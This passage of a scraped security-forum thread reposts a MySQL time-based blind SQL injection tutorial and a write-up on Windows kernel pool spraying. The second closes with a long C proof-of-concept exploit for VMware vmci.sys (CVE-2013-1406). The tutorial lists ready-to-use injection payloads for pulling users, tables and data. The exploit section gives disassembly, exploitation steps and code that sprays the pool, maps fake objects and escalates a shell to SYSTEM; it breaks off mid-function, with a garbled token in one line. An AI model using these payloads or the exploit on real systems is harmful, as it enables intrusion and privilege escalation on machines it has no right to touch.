#pragma pack(1) template <class T> struct LIST_ENTRY_T { T Flink; T Blink; }; template <class T> struct UNICODE_STRING_T { union { struct { WORD Length; WORD MaximumLength; }; T dummy; }; T _Buffer; }; template <class T, class NGF, int A> struct _PEB_T { union { struct { BYTE InheritedAddressSpace; BYTE ReadImageFileExecOptions; BYTE BeingDebugged; BYTE _SYSTEM_DEPENDENT_01; }; T dummy01; }; T Mutant; T ImageBaseAddress; T Ldr; T ProcessParameters; T SubSystemData; T ProcessHeap; T FastPebLock; T _SYSTEM_DEPENDENT_02; T _SYSTEM_DEPENDENT_03; T _SYSTEM_DEPENDENT_04; union { T KernelCallbackTable; T UserSharedInfoPtr; }; DWORD SystemReserved; DWORD _SYSTEM_DEPENDENT_05; T _SYSTEM_DEPENDENT_06; T TlsExpansionCounter; T TlsBitmap; DWORD TlsBitmapBits[2]; T ReadOnlySharedMemoryBase; T _SYSTEM_DEPENDENT_07; T ReadOnlyStaticServerData; T AnsiCodePageData; T OemCodePageData; T UnicodeCaseTableData; DWORD NumberOfProcessors; union { DWORD NtGlobalFlag; NGF dummy02; }; LARGE_INTEGER CriticalSectionTimeout; T HeapSegmentReserve; T HeapSegmentCommit; T HeapDeCommitTotalFreeThreshold; T HeapDeCommitFreeBlockThreshold; DWORD NumberOfHeaps; DWORD MaximumNumberOfHeaps; T ProcessHeaps; T GdiSharedHandleTable; T ProcessStarterHelper; T GdiDCAttributeList; T LoaderLock; DWORD OSMajorVersion; DWORD OSMinorVersion; WORD OSBuildNumber; WORD OSCSDVersion; DWORD OSPlatformId; DWORD ImageSubsystem; DWORD ImageSubsystemMajorVersion; T ImageSubsystemMinorVersion; union { T ImageProcessAffinityMask; T ActiveProcessAffinityMask; }; T GdiHandleBuffer[A]; T PostProcessInitRoutine; T TlsExpansionBitmap; DWORD TlsExpansionBitmapBits[32]; T SessionId; ULARGE_INTEGER AppCompatFlags; ULARGE_INTEGER AppCompatFlagsUser; T pShimData; T AppCompatInfo; UNICODE_STRING_T<T> CSDVersion; T ActivationContextData; T ProcessAssemblyStorageMap; T SystemDefaultActivationContextData; T SystemAssemblyStorageMap; T MinimumStackCommit; }; typedef _PEB_T<DWORD, DWORD64, 34> PEB32; typedef _PEB_T<DWORD64, DWORD, 30> PEB64; #pragma pack(pop) Above version is system independent as all fields that are changing across OS versions are marked as _SYSTEM_DEPENDENT_xx. I’ve also removed all fields from the end that were added after Widnows XP. Sursa: Evolution of Process Environment Block (PEB)
  15. [h=3]MySQL Injection Time Based[/h]We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare. Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi Time-Based Blind SQL Injection with Heavy Queries and of course the greatest cheatsheet, Cheat Sheets | pentestmonkey OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine. Tested on Peruggia application. Lets gO! Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do. But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function. each DBMS have different type of function to use,but the steps usually quite similar. In MSSQL we use WAITFOR DELAY In POSTGRES we use PG_DELAY() and so on..do check it on pentestmonkey cheatsheet Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not. Test it using this command pic_id=13 and sleep(5)-- As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well. Lets proceed to check the current user. Here's the command the we are going to use pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)-- Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters. From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why? Because the 1st character of the current user start with 'p'.. not 'a' or 'h' Then you can proceed to check for its 2nd character and so on. pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)-- pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)-- so on.. So go on with table_name guessing. pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1) The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then. While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist! How about guessing the column_name?Its easy. pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1) See the image above?Still need any explanation? I bet you guys already understand it! Get the data mode! pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)-- So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds. And then proceed to test the 2nd,3rd char and so on.. The image shown that the username=admin..so is it correct?lets double check it Yeahhh.its correct. That's all for now! Thanks, @yappare Sursa: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
  16. [h=3]Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406[/h]Author: Artem Shishkin, Positive Research. If you deal with Windows kernel vulnerabilities, it is likely that you’ll have to deal with a kernel pool in order to develop an exploit. I guess it is useful to learn how to keep the behavior of this kernel entity under your control. In this article I will try to give a high level overview of kernel pool internals. This object has already been deeply researched several times, so if you need more technical information, you please goolge it or use the references at the end of this article. Kernel pool structure overview Kernel pool is a common place for mining memory in the operating system kernel. Remember that there are very small stacks in the kernel environment. They are suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will certainly use the pool memory. There are different types of pools, but all of them have the same structure (except of the driver verifier’s special pool). Every pool has a special control structure called a pool descriptor. Among the other purposes, it maintains lists of free pool chunks, which represent a free pool space. A pool itself consists of memory pages. They can be standard 4 KB or large 1 MB in size. The number of pages used for the pool is dynamically adjusted. Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool. Pool chunk on x86 systems Pool chunks have the following meta-information inside 1. Previous size — a size of the preceding chunk. 2. Pool index field is used for situations with more than one pool of a certain type. For example, there are multiple paged pools in the system. This field is used to identify which exact paged pool this chunk belongs to. 3. Block size is a size of the current chunk. Just like the previous size field, the size is encoded as (pool chunk data size + size of pool header + optional 4 bytes of a pointer to the process quoted) >> 3 (or >> 4 on x64 systems). 4. Pool type field is a flag bitmask for the current chunk. Notice that those flags are not officially documented. T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes. S (Session): the chunk belongs to the paged session pool, it is a special pool used for session specific allocations. Q (Quota): the chunk takes part in quota management mechanism. This flag is only relevant for 32-bit systems. If this flag is present, a pointer to the process quoted this chunk is stored at the end of the chunk. U (In use): this chunk is currently in use. As opposed a chunk can be free, which means that we can allocate memory from it. This flag is a third bit for pre-vista systems and the second for vista and upper. B (Base pool) identifies a pool which the chunk belongs to. There are two base pools – paged and non-paged. Non-paged pool is encoded as 0 and paged pool as 1. For pre-vista systems this flag could occupy two bits because the base pool type was encoded as (base pool type + 1), that is 0x10 for paged pool and 0x1 for non-paged pool. 5. Pool tag is used for debugging purposes. Drivers specify a four-byte character signature which identifies a subsystem or a driver that uses this chunk. For example “NtFs” tag means that this chunk belongs to the ntfs.sys driver. Pool chunk on x64 systems There is a couple of differences on 64-bit systems. The first one is a different size for fields and the second one is a new 8-byte field with a pointer to the process that quoted this chunk. Kernel pool memory allocation overview Imagine that the pool is empty. I mean there is no pool space at all. If we try to allocate memory from the pool (let’s say that its size is less than 0xFF0), it will first allocate a memory page and then place a chunk of the requested size on it. Since it is the first allocation on this page, the chunk will be placed at the start of this page. The first pool chunk allocation sequence This page has now two pool chunks — the one that we allocated and a free one. The free chunk can now be used for consequent allocations. But from this moment pool allocator tends to place new chunks at the end of the page or the free space within this page. Pool chunk allocation strategy When it comes to the deallocation of the chunks, the process is repeated in a reverse order. The chunks become free, and they are merged if they are adjacent. Pool deallocation strategy The whole situation with empty pools is just a fantasy, because the pools are charged with memory pages by the moment we can actually use them. Controlling the behavior of chunk allocations Let’s keep in mind the fact that kernel pool is a heavily-used object. First of all it used for creating all sorts of kernel objects, private kernel and drivers structures. Secondly, kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system stays idle. Sooner or later kernel pool becomes fragmented. It happens because of different sizes of allocations and frees following in a different order. Here goes out the origin of the “spraying” term — when sequentially allocating chunks of pool, those chunks are not necessarily followed by each other, there are most likely to be located at completely different places in memory. So, when filling the pool memory with controlled red-painted chunks we are likely going to see the left side of a picture, then the right one. Heap spraying leads to the left picture, not the right one But there is an important exploiting-relevant circumstance: when there is no black region left for painting, we’ll get a new black region without stranger’s spots. From this point our spray becomes an ordinary brush with solid color fill. From here we have a considerable level of controlling the behavior of chunk allocation and a picture of the pool. We say considerable because it is still not the case when we are guaranteed to be the painting master, because our painting process can be interrupted by someone else spilling a different color. The spraying becomes filling when using a lot of objects Depending on a type of an object that we are using for spraying, we are able to create free windows of a needed size by freeing a number of objects that we created before. And the most important fact that allows us to make a controlled allocation is that pool allocator tends to be as fast as it possible. In order to use processor cache effectively the last freed pool chunk will be the first one that is allocated! It is the point of the controlled allocation because we can guess the address of the chunk to be allocated. Of course the size of the allocation matters. That’s why we have to calculate the size of the free chunks window. If we have to allocate a 0x315 bytes chunk, and we are spraying 0x20 bytes chunks, we have to free 0x315 / 0x20 = (0x18 + 1) chunks. I hope this is clear enough. Here are some points we need to consider in order to be successful in kernel pool spraying: 1. If you don’t have an opportunity of allocating the kernel pool with some sort of a target driver, you can always use windows objects as spraying objects. Since windows object are naturally the object of the operating system kernel, they are stored in kernel pools. For non-paged pool you can use processes, threads, events, semaphores, mutexes etc. For paged pool you can use directory objects, key objects, section objects (also known as file mapping) etc. For session pool you can use any GDI or USER object: palettes, DCs, brushes etc. In order to free the memory occupied by those objects, you can simply close all open handles to them. 2. By the time we are going to start spraying there are pages available for pool usage, but they are too defragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool so there is no place on currently available pages. After this we’ll get a new clean page leading to the chance of sequential allocation of controlled chunks. In a nutshell, create lots of spraying objects. 3. When calculating a necessary window size, keep in mind that chunk header size matters, also the whole size is rounded up to 8 and 16 bytes on x86 and x64 machines respectively. 4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict relative positions of the sprayed objects. If you use windows object for spraying thus having only the handle of an object but not it’s address, you can leak kernel object using the NtQuerySystemInformation() function with SystemExtendedHandleInformation class. It will provide you all the information needed for precise spraying. 5. Keep the balance of the sprayed objects quantity. You’ll probably fail controlling the chunk allocation when the is no memory left in the system at all. 6. One of the tricks that might help you to improve reliability of kernel pool based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for using the pool memory it is useful to modify the pool sharing priority by having more chances to execute than the other threads in the system. It will help you to keep your spraying more consistent. Also consider the gap between spraying and triggering the vulnerability: the less it is, the more chance you get to land on the controlled pool chunk. VMware CVE 2013-1406 A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems thus leading to a double ownage. The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interfaceis used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type implemented as a Windows Socket Service Provider in a vsocklib.dll library. The module vmci.sys creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware tools have to be installed in order to use VMCI. When writing an overview it would be nice to explain a high-level logic of vulnerability in order to present a detective-like story. Unfortunately this is not the case, because there is not much public information about VMCI implementation. I don’t think that people who exploit vulnerabilities always go deep into details reverse engineering the whole target system. At least it would be more profitable to obtain a stable working exploit within a week than a high-level knowledge of how the things work in months. PatchDiff highlight three patched functions. All of them were are relevant to the same IOCTL code 0x8103208C – something terribly went wrong with handling it. Control flow of the code processing the 0x8103208C IOCTL The third patched function eventually was called both from the first and the second ones. The third function is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. It contained an internal structure for dispatching the request. The problem was that a chunk size was specified in a user buffer for this IOCTL code and was not checked properly. As a result, an internal structure was not allocated which led to interesting consequences. A buffer is supplied for this IOCTL, its size is supposed to be 0x624 in order to reach patched functions. In order to process user request in internal structure is allocated, its size is 0x20C. Its first 4 bytes were filled with a value, specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure the pointer to which is then stored at the last four bytes of the first one. But no matter was the second chunk allocated or not, a sort of a dispatch function was invoked. .text:0001B2B4 ; int __stdcall DispatchChunk(PVOID pChunk) .text:0001B2B4 DispatchChunk proc near ; CODE XREF: PatchedOne+78 .text:0001B2B4 ; UnsafeCallToPatchedThree+121 .text:0001B2B4 .text:0001B2B4 pChunk = dword ptr 8 .text:0001B2B4 .text:0001B2B4 000 mov edi, edi .text:0001B2B6 000 push ebp .text:0001B2B7 004 mov ebp, esp .text:0001B2B9 004 push ebx .text:0001B2BA 008 push esi .text:0001B2BB 00C mov esi, [ebp+pChunk] .text:0001B2BE 00C mov eax, [esi+208h] .text:0001B2C4 00C xor ebx, ebx .text:0001B2C6 00C cmp eax, ebx .text:0001B2C8 00C jz short CheckNullUserSize .text:0001B2CA 00C push eax ; P .text:0001B2CB 010 call ProcessParam ; We won’t get here .text:0001B2D0 .text:0001B2D0 CheckNullUserSize: ; CODE XREF: DispatchChunk+14 .text:0001B2D0 00C cmp [esi], ebx .text:0001B2D2 00C jbe short CleanupAndRet .text:0001B2D4 00C push edi .text:0001B2D5 010 lea edi, [esi+8] .text:0001B2D8 .text:0001B2D8 ProcessUserBuff: ; CODE XREF: DispatchChunk+51 .text:0001B2D8 010 mov eax, [edi] .text:0001B2DA 010 test eax, eax .text:0001B2DC 010 jz short NextCycle .text:0001B2DE 010 or ecx, 0FFFFFFFFh .text:0001B2E1 010 lea edx, [eax+38h] .text:0001B2E4 010 lock xadd [edx], ecx .text:0001B2E8 010 cmp ecx, 1 .text:0001B2EB 010 jnz short DerefObj .text:0001B2ED 010 push eax .text:0001B2EE 014 call UnsafeFire ; BANG!!!! .text:0001B2F3 .text:0001B2F3 DerefObj: ; CODE XREF: DispatchChunk+37 .text:0001B2F3 010 mov ecx, [edi+100h] ; Object .text:0001B2F9 010 call ds:ObfDereferenceObject .text:0001B2FF .text:0001B2FF NextCycle: ; CODE XREF: DispatchChunk+28 .text:0001B2FF 010 inc ebx .text:0001B300 010 add edi, 4 .text:0001B303 010 cmp ebx, [esi] .text:0001B305 010 jb short ProcessUserBuff .text:0001B307 010 pop edi .text:0001B308 .text:0001B308 CleanupAndRet: ; CODE XREF: DispatchChunk+1E .text:0001B308 00C push 20Ch ; size_t .text:0001B30D 010 push esi ; void * .text:0001B30E 014 call ZeroChunk .text:0001B313 00C push 'gksv' ; Tag .text:0001B318 010 push esi ; P .text:0001B319 014 call ds:ExFreePoolWithTag .text:0001B31F 00C pop esi .text:0001B320 008 pop ebx .text:0001B321 004 pop ebp .text:0001B322 000 retn 4 .text:0001B322 DispatchChunk endp The dispatch function was searching for a pointer to process. The processing included dereferencing some object and calling some function if an appropriate flags had been set inside the pointed structure. But since we failed to allocate a structure to process, the dispatch function slid beyond the end of the first chunk. This processing leads to an access violation and a following BSOD when uncontrolled. IOCTL dispatch structure and the dispatcher behavior So we’ve got a possible code execution at the controlled address: .text:0001B946 .text:0001B946 .text:0001B946 arg_0 = dword ptr 8 .text:0001B946 .text:0001B946 000 mov edi, edi .text:0001B948 000 push ebp .text:0001B949 004 mov ebp, esp .text:0001B94B 004 mov eax, [ebp+arg_0] .text:0001B94E 004 push eax .text:0001B94F 008 call dword ptr [eax+0ACh] ; BANG!!!! .text:0001B955 004 pop ebp .text:0001B956 000 retn 4 .text:0001B956 UnsafeFire endp.text:0001B946 UnsafeFire proc near Exploitation Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets the neighbor chunk or an unmapped page. If it falls into an unmapped memory, a BSOD occurs. But when it meets another pool chunk it tries to process a pool header interpreting it as a pointer. Consider x86 system. The four bytes the dispatcher function tries to interpret as a pointer are the previous block size, pool index, current block size and pool type flags. Since we know the size and a pool index used for the skipped chunk, we know the low word of a pointer: 0xXXXX0043 – 0x43 is a size of a skipped chunk, thus becomes a previous size of a chunk in a neighbor. 0x0 is a pool index, which is guaranteed to be equal to 0, since non-paged pool used for the skipped chunk is the only one in the system. Notice that if the two adjacent chunks share the same pool page, they belong to the same pool type and index. The high word contains the block size, which we can’t predict and pool type flags which we can: B = 0 because the chunk is from the non-paged pool, U = 1 because the is supposed to be in use, Q = 0/1 the chunk might be quoted, S = 0 because the pool is not the session one, T = 0 pool tracking is likely to be disabled by default. The unused bits in the pool type field are equal to 0. So we’ve got the following memory windows valid for Windows 7 and Windows 8: 0x04000000 – 0x06000000 for ordinary chunks 0x14000000 – 0x16000000 for quoted chunks Based on the provided information you can easily calculate memory windows for Windows XP and alike. As you can see, those memory ranges belong to the user space, so we are able to force the vulnerable dispatch function to execute a shellcode that we provide. In order to perform arbitrary code execution we have to map the calculated regions and meet the requirements of the dispatch function: 1. Within the [0x43 + 0x38] place a DWORD value of 1 in order to meet the requirements of the following code: .text:0001B2E1 010 lea edx, [eax+38h] .text:0001B2E4 010 lock xadd [edx], ecx .text:0001B2E8 010 cmp ecx, 1 2. Within the [0x43 + 0xAC] place a pointer to the function to be called, or simply the address of a shellcode. 3. Within the [0x43 + 0x100] place a pointer of a fake object to be dereferenced with ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset to the object itself, so be sure that this function is not going to land on the unmapped region. Also provide a suitable reference count in order the ObfDereferenceObject() would not try to free the user-mode memory with the functions that are not suited for that. 4. Repeat this algorithm for every 0x10000 bytes. Everything has been done right! Improving reliability of an exploit Although we have developed a nice strategy of exploitation, it is still unreliable. Consider the case when the chunk after vulnerable one is freed. It is difficult to guess the state of this chunk fields. That means that although such chunk forms a pointer valid for the dispatch function (because it is not NULL) the result of the dispatching will lead to a BSOD. It is also true for the case when the dispatch function slides to an unmapped virtual address. Kernel pool spraying is very useful in this case. As a spraying object I chose semaphores since they could provide the closest chunk size to the one I needed. As a result this technique helped a lot improving the stability of an exploit. Remember that Windows 8 has a SMEP support, so it is a little bit more complicate to exploit due to the laziness of a shellcode developer. Writing a base-independent code and bypassing SMEP is left as an exercise for a reader. As for the x64 systems, the problem is that the pointer became 8 bytes in size. This means that a high DWORD of a pointer interpreted in the dispatch function falls on the pool chunk tag field. As far as most drivers and kernel subsystems user ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can’t be used for exploitation. By this time I was unable to find a solution for this problem. In the end I hope this article was useful for you, and I’m sorry that I could not fit all the needed information in a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making the things more secure. Source Code: /* CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 */ void __stdcall FireShell(DWORD dwSomeParam) { EscalatePrivileges(hProcessToElevate); // Equate the stack and quit the cycle #ifndef _AMD64_ __asm { pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 } #endif } HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) { HANDLE hResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) { hResult = pHandleTable->Handles[i].HandleValue; break; } } return hResult; } PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { PVOID pResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pResult = (HANDLE)pHandleTable->Handles[i].Object; break; } } return pResult; } void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pHandleTable->Handles[i].Object = NULL; pHandleTable->Handles[i].HandleValue = NULL; break; } } return; } void PoolSpray() { // Init used native API function lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModu leHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { printf("Such a fail...\n"); return; } // Determine object size // xp: //const DWORD_PTR dwSemaphoreSize = 0x38; // 7: //const DWORD_PTR dwSemaphoreSize = 0x48; DWORD_PTR dwSemaphoreSize = 0; if (LOBYTE(GetVersion()) == 5) { dwSemaphoreSize = 0x38; } else if (LOBYTE(GetVersion()) == 6) { dwSemaphoreSize = 0x48; } unsigned int cycleCount = 0; while (cycleCount < 50000) { HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); if (hTemp == NULL) { break; } ++cycleCount; } printf("\t[+] Spawned lots of semaphores\n"); printf("\t[.] Initing pool windows\n"); Sleep(2000); DWORD dwNeeded = 4096; NTSTATUS status = 0xFFFFFFFF; PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); while (true) { status = NtQuerySystemInformation(SystemExtendedHandleInfor mation, pBuf, dwNeeded, NULL); if (status != STATUS_SUCCESS) { dwNeeded *= 2; VirtualFree(pBuf, 0, MEM_RELEASE); pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); } else { break; } }; HANDLE hHandlesToClose[0x30] = {0}; DWORD dwCurPID = GetCurrentProcessId(); PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) { if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) { DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; DWORD_PTR dwWindowAddress = 0; bool bPoolWindowFound = false; UINT iObjectsNeeded = 0; // Needed window size is vmci packet pool chunk size (0x218) divided by // Semaphore pool chunk size (dwSemaphoreSize) iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); if ( // Not on a page boundary ((dwTestObjAddr & 0xFFF) != 0) && // Doesn't cross page boundary (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) ) { // Check previous object for being our semaphore DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) { continue; } for (unsigned int j = 1; j < iObjectsNeeded; j++) { DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); //printf("\tLooked up handle = %08X\n", hLookedUp); if (hLookedUp != NULL) { hHandlesToClose[j] = hLookedUp; if (j == iObjectsNeeded - 1) { // Now test the following object dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) { hHandlesToClose[0] = (HANDLE)dwTestHandleVal; bPoolWindowFound = true; dwWindowAddress = dwTestObjAddr; // Close handles to create a memory window for (int k = 0; k < iObjectsNeeded; k++) { if (hHandlesToClose[k] != NULL) { CloseHandle(hHandlesToClose[k]); CloseTableHandle(pHandleTable, hHandlesToClose[k]); } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } if (bPoolWindowFound) { printf("\t[+] Window found at %08X!\n", dwWindowAddress); } } } } VirtualFree(pBuf, 0, MEM_RELEASE); return; } void InitFakeBuf(PVOID pBuf, DWORD dwSize) { if (pBuf != NULL) { RtlFillMemory(pBuf, dwSize, 0x11); } return; } void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) { /* Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043 So, for every 0xXXXX0043 address we must suffice the following conditions: lea edx, [eax+38h] lock xadd [edx], ecx cmp ecx, 1 Some sort of lock at [addr + 38] must be equal to 1. And call dword ptr [eax+0ACh] The call site is located at [addr + 0xAC] Also fake the object to be dereferenced at [addr + 0x100] */ if (pBuf != NULL) { for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) { PDWORD pLock = (PDWORD)(iAddr + 0x38); PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); *pLock = 1; *pCallMeMayBe = (DWORD_PTR)FireShell; *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; } } return; } void PenetrateVMCI() { /* VMware Security Advisory Advisory ID: VMSA-2013-0002 Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability Issue date: 2013-02-07 Updated on: 2013-02-07 (initial advisory) CVE numbers: CVE-2013-1406 */ DWORD dwPidToElevate = 0; HANDLE hSuspThread = NULL; bool bXP = (LOBYTE(GetVersion()) == 5); bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); if (!InitKernelFuncs()) { printf("[-] Like I don't know where the shellcode functions are\n"); return; } if (bXP) { printf("[?] Who do we want to elevate?\n"); scanf_s("%d", &dwPidToElevate); hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); if (hProcessToElevate == NULL) { printf("[-] This process doesn't want to be elevated\n"); return; } } if (b7 || b8) { // We are unable to change an active process token on-the-fly, // so we create a custom shell suspended (Ionescu hack) STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.wShowWindow = TRUE; WCHAR cmdPath[MAX_PATH] = {0}; GetSystemDirectory(cmdPath, MAX_PATH); wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, ?) == TRUE) { hProcessToElevate = pi.hProcess; hSuspThread = pi.hThread; } } HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (hVMCIDevice != INVALID_HANDLE_VALUE) { UCHAR BadBuff[0x624] = {0}; UCHAR retBuf[0x624] = {0}; DWORD dwRet = 0; printf("[+] VMCI service found running\n"); PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; pVmReq->Header.RequestSize = 0xFFFFFFF0; PVOID pShellSprayBufStd = NULL; PVOID pShellSprayBufQtd = NULL; PVOID pShellSprayBufStd7 = NULL; PVOID pShellSprayBufQtd7 = NULL; PVOID pShellSprayBufChk8 = NULL; if ((b7) || (bXP) || (b8)) { /* Significant bits of a PoolType of a chunk define the following regions: 0x0A000000 - 0x0BFFFFFF - Standard chunk 0x1A000000 - 0x1BFFFFFF - Quoted chunk 0x0 - 0xFFFFFFFF - Free chunk - no idea Addon for Windows 7: Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7: 0x04000000 - 0x06000000 - Standard chunk 0x14000000 - 0x16000000 - Quoted chunk */ pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) { printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); 